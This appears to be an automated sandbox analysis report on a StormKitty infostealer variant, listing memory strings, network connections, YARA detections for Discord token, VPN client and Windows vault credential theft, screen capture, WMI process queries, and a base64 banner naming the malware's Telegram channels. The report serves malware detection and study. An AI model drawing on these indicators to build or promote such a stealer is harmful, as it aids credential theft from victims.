Source: chrome.exe, 0000000A.00000002.1070464744.000016F000624000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1011385045.000016F000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1013106889.000016F000622000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
Source: chrome.exe, 0000000A.00000002.1054200717.000001CF82850000.00000002.00000001.00040000.00000012.sdmp	String found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlH&elpManaged
Source: chrome.exe, 0000000A.00000002.1074547401.000016F400BA4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1074859811.000016F400CA8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1077759790.000016F4015B4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/tips/
Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1085719014.0000000004499000.00000004.00000800.00020000.00000000.sdmp, StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1085719014.00000000044BB000.00000004.00000800.00020000.00000000.sdmp, StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1085719014.00000000044DD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1071850764.000016F40046C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1072469414.000016F400604000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1075843751.000016F401044000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1073203488.000016F400804000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1026099713.000016F401044000.00000004.00001000.00020000.00000000.sdmp, tmp1B07.tmp.dat.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: chrome.exe, 0000000A.00000002.1070464744.000016F000624000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1011385045.000016F000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1013106889.000016F000622000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: chrome.exe, 0000000A.00000002.1071850764.000016F40046C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 0000000A.00000002.1070943254.000016F400138000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
Source: chrome.exe, 0000000A.00000002.1071288278.000016F400210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 0000000A.00000002.1070464744.000016F000624000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1011385045.000016F000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1013106889.000016F000622000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
Source: chrome.exe, 0000000A.00000002.1071288278.000016F400210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 0000000A.00000002.1071288278.000016F400210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 0000000A.00000002.1071288278.000016F400210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 0000000A.00000002.1071288278.000016F400210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 0000000A.00000002.1071381146.000016F4002D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1076839367.000016F40130A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: chrome.exe, 0000000A.00000002.1071381146.000016F4002D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1076839367.000016F40130A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: chrome.exe, 0000000A.00000002.1073248685.000016F40084C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1070735509.000016F40009C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: tmpB2C2.tmp.dat.0.dr	String found in binary or memory: https://www.mozilla.org
Source: tmpB2C2.tmp.dat.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: tmpB2C2.tmp.dat.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: tmpB2C2.tmp.dat.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: tmpB2C2.tmp.dat.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: tmpB2C2.tmp.dat.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.0000000009DB5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com
Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.0000000009DF9000.00000004.00000800.00020000.00000000.sdmp, StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.0000000009D73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.olx.pl/
Source: chrome.exe, 0000000A.00000002.1074285546.000016F400AC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 0000000A.00000002.1074285546.000016F400AC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 0000000A.00000002.1074285546.000016F400AC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 0000000A.00000003.1025895513.000016F400778000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.0000000009DF9000.00000004.00000800.00020000.00000000.sdmp, StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1094533087.0000000009D73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.zhihu.com/
Source: chrome.exe, 0000000A.00000002.1075278942.000016F400E1F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://yieldlab.net

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49688
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown	Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49682
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown	Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49681
Source: unknown	Network traffic detected: HTTP traffic on port 49693 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49688 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49682 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49681 -> 443

Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.7:49681 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.1.100:443 -> 192.168.2.7:49682 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49699 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture screen (.Net source)

Source: StormKittyXZeroTrace.exe.bin.exe, Program.cs

.Net Code: CaptureDesktopScreenshot

System Summary

Malicious sample detected (through community Yara rule)

Source: StormKittyXZeroTrace.exe.bin.exe, type: SAMPLE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: StormKittyXZeroTrace.exe.bin.exe, type: SAMPLE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: StormKittyXZeroTrace.exe.bin.exe, type: SAMPLE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: StormKittyXZeroTrace.exe.bin.exe, type: SAMPLE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: StormKittyXZeroTrace.exe.bin.exe, type: SAMPLE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 0.0.StormKittyXZeroTrace.exe.bin.exe.fe0000.0.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 0.0.StormKittyXZeroTrace.exe.bin.exe.fe0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 0.0.StormKittyXZeroTrace.exe.bin.exe.fe0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0.0.StormKittyXZeroTrace.exe.bin.exe.fe0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.0.StormKittyXZeroTrace.exe.bin.exe.fe0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 00000000.00000002.1085360249.000000000337B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000000.00000000.900495812.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: StormKittyXZeroTrace.exe.bin.exe PID: 7108, type: MEMORYSTR	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen

Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Code function: 0_2_0535A290 NtQuerySystemInformation,		0_2_0535A290
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Code function: 0_2_0535A27E NtQuerySystemInformation,		0_2_0535A27E

Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Code function: 0_2_0319A1D8	0_2_0319A1D8
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Code function: 0_2_03195578	0_2_03195578
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Code function: 0_2_03194830	0_2_03194830
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Code function: 0_2_0319DCE0	0_2_0319DCE0
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Code function: 0_2_05351FB0	0_2_05351FB0
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Code function: 0_2_053572A5	0_2_053572A5

Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000002.1083593548.000000000152E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs StormKittyXZeroTrace.exe.bin.exe
Source: StormKittyXZeroTrace.exe.bin.exe, 00000000.00000000.900533337.0000000001018000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameZeroTrace.exe4 vs StormKittyXZeroTrace.exe.bin.exe
Source: StormKittyXZeroTrace.exe.bin.exe	Binary or memory string: OriginalFilenameZeroTrace.exe4 vs StormKittyXZeroTrace.exe.bin.exe

Source: StormKittyXZeroTrace.exe.bin.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: StormKittyXZeroTrace.exe.bin.exe, type: SAMPLE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: StormKittyXZeroTrace.exe.bin.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: StormKittyXZeroTrace.exe.bin.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: StormKittyXZeroTrace.exe.bin.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: StormKittyXZeroTrace.exe.bin.exe, type: SAMPLE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 0.0.StormKittyXZeroTrace.exe.bin.exe.fe0000.0.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 0.0.StormKittyXZeroTrace.exe.bin.exe.fe0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 0.0.StormKittyXZeroTrace.exe.bin.exe.fe0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.0.StormKittyXZeroTrace.exe.bin.exe.fe0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.0.StormKittyXZeroTrace.exe.bin.exe.fe0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 00000000.00000002.1085360249.000000000337B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000000.00000000.900495812.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: StormKittyXZeroTrace.exe.bin.exe PID: 7108, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions

Source: StormKittyXZeroTrace.exe.bin.exe, Information.cs

Base64 encoded string: 'WmVyb1RyYWNlIERldmVsb3BlZCBCeSAgWmVyb1RyYWNlICYgQUFSCgpKb2luIENoYW5uZWwgOiBodHRwczovL3QubWUvemVyb3RyYWNlZGV2CkpvaW4gR3JvdXAgOiBodHRwczovL3QubWUvemVyb3RyYWNlZ3JvdXAKCgpXcml0ZSBUbyBEZXZlbG9wZXIgOiBodHRwczovL3QubWUvWmVyb1RyYWNlRGV2ZWxvcGVyCgpbIFRIQU5LUyBGT1IgVVNJTkcgWkVST1RSQUNFICEgXQoKPDMzMzM='

Source: StormKittyXZeroTrace.exe.bin.exe

Binary string: ParentProcessId3\Device\LanmanRedirector\

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@33/31@6/5

Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\StormKittyXZeroTrace.exe.bin.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6844:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6480:120:WilError_03

Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe

File created: C:\Users\user\AppData\Local\Temp\8.46.123.189

Jump to behavior

Source: StormKittyXZeroTrace.exe.bin.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: StormKittyXZeroTrace.exe.bin.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe

System information queried: HandleInformation

Jump to behavior

Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
